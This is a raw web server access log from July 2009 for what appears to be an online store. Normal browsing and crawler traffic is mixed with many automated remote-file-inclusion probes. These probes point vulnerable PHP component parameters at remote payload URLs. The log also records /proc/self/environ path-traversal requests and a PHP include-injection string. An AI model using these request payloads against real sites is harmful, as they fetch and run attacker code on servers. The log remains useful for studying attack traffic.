204.30.3.225 - - [16/Jul/2009:00:00:16 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
204.30.3.225 - - [16/Jul/2009:00:00:16 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
204.30.3.225 - - [16/Jul/2009:00:00:16 -0400] "GET /logs/access_log.Q109061900%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
65.55.105.236 - - [16/Jul/2009:00:00:16 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.236 - - [16/Jul/2009:00:00:17 -0400] "GET /logs/error_log.Q107060700 HTTP/1.1" 404 223 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
200.11.202.196 - - [16/Jul/2009:00:02:13 -0400] "GET /logs/access_log.Q109070600//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.youthsoroca.md/php-nuke/foto/safe.jpg? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
200.11.202.196 - - [16/Jul/2009:00:02:13 -0400] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.youthsoroca.md/php-nuke/foto/safe.jpg? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
63.223.85.28 - - [16/Jul/2009:00:02:21 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kluftzero.de//images/idfx1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
63.223.85.28 - - [16/Jul/2009:00:02:21 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kluftzero.de//images/idfx1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
222.236.47.192 - - [16/Jul/2009:00:02:44 -0400] "GET /logs/errors.php?error=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.236.47.192 - - [16/Jul/2009:00:02:44 -0400] "GET /errors.php?error=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.236.47.192 - - [16/Jul/2009:00:02:44 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.192 - - [16/Jul/2009:00:02:44 -0400] "GET /logs/access_log.Q109062100/errors.php?error=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
63.223.85.28 - - [16/Jul/2009:00:02:56 -0400] "GET /logs/access_log.Q109052500//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kluftzero.de//images/idfx1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
63.223.85.28 - - [16/Jul/2009:00:03:14 -0400] "GET /logs/access_log.Q109063000//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
200.11.202.196 - - [16/Jul/2009:00:03:20 -0400] "GET /logs/access_log.Q109071100//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.youthsoroca.md/php-nuke/foto/safe.jpg? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
211.230.156.161 - - [16/Jul/2009:00:03:24 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:00:03:24 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:00:03:24 -0400] "GET /logs/access_log.Q109061900%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:00:03:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.243.71 - - [16/Jul/2009:00:03:50 -0400] "GET /logs/access_log.Q109070400/index1.php?page=http://aboutav.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.7.219.135 - - [16/Jul/2009:00:04:13 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018C5A4539C495002C5100V+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
65.7.219.135 - - [16/Jul/2009:00:04:13 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018C5A4539C495002C5100V+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
65.7.219.135 - - [16/Jul/2009:00:04:13 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018C5A4539C495002C5100V+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
218.38.243.71 - - [16/Jul/2009:00:04:31 -0400] "GET /logs/access_log.Q109070400/index1.php?page=http://aboutav.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:00:04:36 -0400] "GET /logs/access_log.Q109061900/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
91.199.212.132 - - [16/Jul/2009:00:04:42 -0400] "HEAD /robots.txt HTTP/1.1" 404 - "-" "Comodo SSL Checker"
91.209.196.70 - - [16/Jul/2009:00:04:43 -0400] "GET / HTTP/1.1" 200 409 "-" "-"
91.199.212.132 - - [16/Jul/2009:00:04:44 -0400] "HEAD /robots.txt HTTP/1.1" 404 - "-" "Comodo SSL Checker"
91.209.196.70 - - [16/Jul/2009:00:04:44 -0400] "GET / HTTP/1.1" 200 409 "-" "-"
91.209.196.70 - - [16/Jul/2009:00:04:45 -0400] "GET / HTTP/1.1" 200 409 "-" "-"
91.209.196.70 - - [16/Jul/2009:00:04:45 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "-" "-"
91.209.196.70 - - [16/Jul/2009:00:04:45 -0400] "GET /Includes/ HTTP/1.1" 200 220 "-" "-"
91.209.196.70 - - [16/Jul/2009:00:04:45 -0400] "GET /images/ HTTP/1.1" 200 49338 "-" "-"
91.209.196.70 - - [16/Jul/2009:00:04:51 -0400] "GET /index.htm HTTP/1.1" 200 870 "-" "-"
91.209.196.70 - - [16/Jul/2009:00:04:51 -0400] "GET /logs/ HTTP/1.1" 200 9726 "-" "-"
91.209.196.70 - - [16/Jul/2009:00:04:52 -0400] "GET /scripts/ HTTP/1.1" 200 802 "-" "-"
91.209.196.70 - - [16/Jul/2009:00:04:52 -0400] "GET /JavaScript:SignonCust() HTTP/1.1" 404 221 "-" "-"
91.209.196.70 - - [16/Jul/2009:00:04:52 -0400] "GET /JavaScript:LostAccount() HTTP/1.1" 404 222 "-" "-"
91.209.196.70 - - [16/Jul/2009:00:04:53 -0400] "GET /JavaScript:SignonSales() HTTP/1.1" 404 222 "-" "-"
91.209.196.70 - - [16/Jul/2009:00:04:53 -0400] "GET /JavaScript:Search() HTTP/1.1" 404 217 "-" "-"
211.230.156.161 - - [16/Jul/2009:00:05:20 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:00:05:39 -0400] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:00:05:39 -0400] "GET /logs/access_log.Q109062800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
204.30.3.225 - - [16/Jul/2009:00:06:11 -0400] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
204.30.3.225 - - [16/Jul/2009:00:06:11 -0400] "GET /logs/access_log.Q109062800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
208.187.91.50 - - [16/Jul/2009:00:06:19 -0400] "GET /logs/error_log.Q109050700/?_SERVER[DOCUMENT_ROOT]=http://www.nakjimadang.com/ams/amboard/upload/bajocdm2?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
208.187.91.50 - - [16/Jul/2009:00:06:19 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.nakjimadang.com/ams/amboard/upload/bajocdm2?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
208.187.91.50 - - [16/Jul/2009:00:06:20 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.nakjimadang.com/ams/amboard/upload/bajocdm2?? HTTP/1.1" 200 9726 "-" "libwww-perl/5.805"
204.30.3.225 - - [16/Jul/2009:00:06:26 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
208.187.91.50 - - [16/Jul/2009:00:06:46 -0400] "GET /logs/access_log.Q109050700/?_SERVER[DOCUMENT_ROOT]=http://www.nakjimadang.com/ams/amboard/upload/bajocdm2?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
204.30.3.225 - - [16/Jul/2009:00:06:54 -0400] "GET /logs/access_log.Q109061900/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
210.211.253.16 - - [16/Jul/2009:00:07:11 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
210.211.253.16 - - [16/Jul/2009:00:07:11 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
210.211.253.16 - - [16/Jul/2009:00:07:16 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
210.211.253.16 - - [16/Jul/2009:00:07:16 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
190.144.44.36 - - [16/Jul/2009:00:07:17 -0400] "GET /logs/access_log.Q109063000//textfile/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:07:17 -0400] "GET //textfile/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:07:17 -0400] "GET /logs//textfile/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
123.143.98.5 - - [16/Jul/2009:00:07:34 -0400] "GET /logs/phprojekt/lib/layout/venus/venus.php?path_pre=http://aboutav.com//id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
123.143.98.5 - - [16/Jul/2009:00:07:34 -0400] "GET /phprojekt/lib/layout/venus/venus.php?path_pre=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
123.143.98.5 - - [16/Jul/2009:00:07:34 -0400] "GET /logs/access_log.Q109061100%20%20/phprojekt/lib/layout/venus/venus.php?path_pre=http://aboutav.com//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
123.143.98.5 - - [16/Jul/2009:00:07:35 -0400] "GET /logs/phprojekt/lib/layout/venus/venus.php?path_pre=http://aboutav.com//id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
123.143.98.5 - - [16/Jul/2009:00:07:35 -0400] "GET /logs/access_log.Q109061100%20%20/phprojekt/lib/layout/venus/venus.php?path_pre=http://aboutav.com//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
123.143.98.5 - - [16/Jul/2009:00:07:35 -0400] "GET /phprojekt/lib/layout/venus/venus.php?path_pre=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.236.47.192 - - [16/Jul/2009:00:07:58 -0400] "GET /logs/access_log.Q109070500%20%20/errors.php?error=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.38.243.71 - - [16/Jul/2009:00:08:01 -0400] "GET /logs/index1.php?page=http://aboutav.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.38.243.71 - - [16/Jul/2009:00:08:02 -0400] "GET /index1.php?page=http://aboutav.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.38.243.71 - - [16/Jul/2009:00:08:03 -0400] "GET /logs/access_log.Q109061300%20%20/index1.php?page=http://aboutav.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.38.243.71 - - [16/Jul/2009:00:08:03 -0400] "GET /logs/access_log.Q109070400%20%20/index1.php?page=http://aboutav.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:00:08:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.236.47.192 - - [16/Jul/2009:00:08:40 -0400] "GET /logs/access_log.Q109062100%20%20/errors.php?error=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.68.70 - - [16/Jul/2009:00:08:43 -0400] "GET /images/items/freezedriedbone.gif HTTP/1.1" 200 20740 "-" "Googlebot-Image/1.0"
61.78.62.84 - - [16/Jul/2009:00:08:51 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:00:08:51 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:00:08:51 -0400] "GET /logs/access_log.Q109051100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:00:08:56 -0400] "GET /logs/access_log.Q109062900//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:00:09:00 -0400] "GET /logs/access_log.Q109051100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:00:09:00 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:00:09:00 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
190.144.44.36 - - [16/Jul/2009:00:09:01 -0400] "GET /logs/access_log.Q109063000%20%20//textfile/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
61.78.62.84 - - [16/Jul/2009:00:09:05 -0400] "GET /logs/access_log.Q109062900//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
24.190.39.108 - - [16/Jul/2009:00:10:18 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01 HTTP/1.1" 200 54804 "http://www.acesurgical.com/expand_chisel.html" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5000; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
64.12.116.198 - - [16/Jul/2009:00:10:18 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01 HTTP/1.1" 200 54804 "http://www.acesurgical.com/expand_chisel.html" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5000; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
64.12.116.18 - - [16/Jul/2009:00:10:22 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5000; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
64.12.116.199 - - [16/Jul/2009:00:10:22 -0400] "GET /images/items/4544700_THUMB.JPG HTTP/1.1" 200 3000 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5000; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
64.12.116.206 - - [16/Jul/2009:00:10:22 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5000; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
64.12.117.12 - - [16/Jul/2009:00:10:37 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L019C6442317471004F7105C+M37+ENG HTTP/1.1" 200 38016 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5000; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
218.38.243.71 - - [16/Jul/2009:00:12:37 -0400] "GET /logs/index1.php?page=http://aboutav.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.38.243.71 - - [16/Jul/2009:00:12:38 -0400] "GET /logs/access_log.Q109061300%20%20/index1.php?page=http://aboutav.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.38.243.71 - - [16/Jul/2009:00:12:38 -0400] "GET /index1.php?page=http://aboutav.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.38.243.71 - - [16/Jul/2009:00:12:46 -0400] "GET /logs/access_log.Q109070400%20%20/index1.php?page=http://aboutav.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.38.243.71 - - [16/Jul/2009:00:12:48 -0400] "GET /logs/access_log.Q109070700/index1.php?page=http://aboutav.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:00:13:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.2.194.146 - - [16/Jul/2009:00:14:35 -0400] "GET ///bemarket/postscript/postscript.php?p_mode=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
62.2.194.146 - - [16/Jul/2009:00:14:35 -0400] "GET /logs///bemarket/postscript/postscript.php?p_mode=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 239 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
62.2.194.146 - - [16/Jul/2009:00:14:35 -0400] "GET /logs/error_log.Q109060700///bemarket/postscript/postscript.php?p_mode=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 260 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
62.2.194.146 - - [16/Jul/2009:00:14:35 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
62.2.194.146 - - [16/Jul/2009:00:14:35 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
62.2.194.146 - - [16/Jul/2009:00:14:35 -0400] "GET /logs/error_log.Q109060700/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
62.2.194.146 - - [16/Jul/2009:00:14:35 -0400] "GET ///bemarket/postscript/postscript.php?p_mode=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 234 "-" "XXXXXX"
62.2.194.146 - - [16/Jul/2009:00:14:35 -0400] "GET /logs///bemarket/postscript/postscript.php?p_mode=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 239 "-" "XXXXXX"
62.2.194.146 - - [16/Jul/2009:00:14:35 -0400] "GET /logs/error_log.Q109060700///bemarket/postscript/postscript.php?p_mode=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 260 "-" "XXXXXX"
62.2.194.146 - - [16/Jul/2009:00:14:35 -0400] "GET ///bemarket/postscript/postscript.php?p_mode=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "XXXXXX"
62.2.194.146 - - [16/Jul/2009:00:14:35 -0400] "GET /logs///bemarket/postscript/postscript.php?p_mode=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 239 "-" "XXXXXX"
62.2.194.146 - - [16/Jul/2009:00:14:35 -0400] "GET /logs/error_log.Q109060700///bemarket/postscript/postscript.php?p_mode=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 260 "-" "XXXXXX"
94.76.244.162 - - [16/Jul/2009:00:14:59 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.afrimidurimi.de/sobi/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
94.76.244.162 - - [16/Jul/2009:00:14:59 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.afrimidurimi.de/sobi/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
94.76.244.162 - - [16/Jul/2009:00:14:59 -0400] "GET /logs/access_log.Q109061500//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.afrimidurimi.de/sobi/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
94.76.244.162 - - [16/Jul/2009:00:14:59 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.afrimidurimi.de/sobi/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
94.76.244.162 - - [16/Jul/2009:00:14:59 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.afrimidurimi.de/sobi/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
94.76.244.162 - - [16/Jul/2009:00:14:59 -0400] "GET /logs/access_log.Q109061500%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.afrimidurimi.de/sobi/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.76.244.162 - - [16/Jul/2009:00:14:59 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.afrimidurimi.de/sobi/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
94.76.244.162 - - [16/Jul/2009:00:14:59 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.afrimidurimi.de/sobi/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.38.243.71 - - [16/Jul/2009:00:17:14 -0400] "GET /logs/access_log.Q109070700/index1.php?page=http://aboutav.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
94.76.244.162 - - [16/Jul/2009:00:17:29 -0400] "GET /logs/access_log.Q109061500//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.afrimidurimi.de/sobi/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
94.76.244.162 - - [16/Jul/2009:00:17:29 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.afrimidurimi.de/sobi/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
94.76.244.162 - - [16/Jul/2009:00:17:29 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.afrimidurimi.de/sobi/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
94.76.244.162 - - [16/Jul/2009:00:17:29 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.afrimidurimi.de/sobi/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.2.194.146 - - [16/Jul/2009:00:18:50 -0400] "GET /logs/access_log.Q109060700///bemarket/postscript/postscript.php?p_mode=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
62.2.194.146 - - [16/Jul/2009:00:18:50 -0400] "GET /logs/access_log.Q109060700/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
62.2.194.146 - - [16/Jul/2009:00:18:50 -0400] "GET /logs/access_log.Q109060700///bemarket/postscript/postscript.php?p_mode=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 261 "-" "XXXXXX"
62.2.194.146 - - [16/Jul/2009:00:18:50 -0400] "GET /logs/access_log.Q109060700///bemarket/postscript/postscript.php?p_mode=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 261 "-" "XXXXXX"
65.254.32.2 - - [16/Jul/2009:00:19:26 -0400] "GET /logs/access_log.Q109070100//includes/ktedit/toolbar.php?dirDepth=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
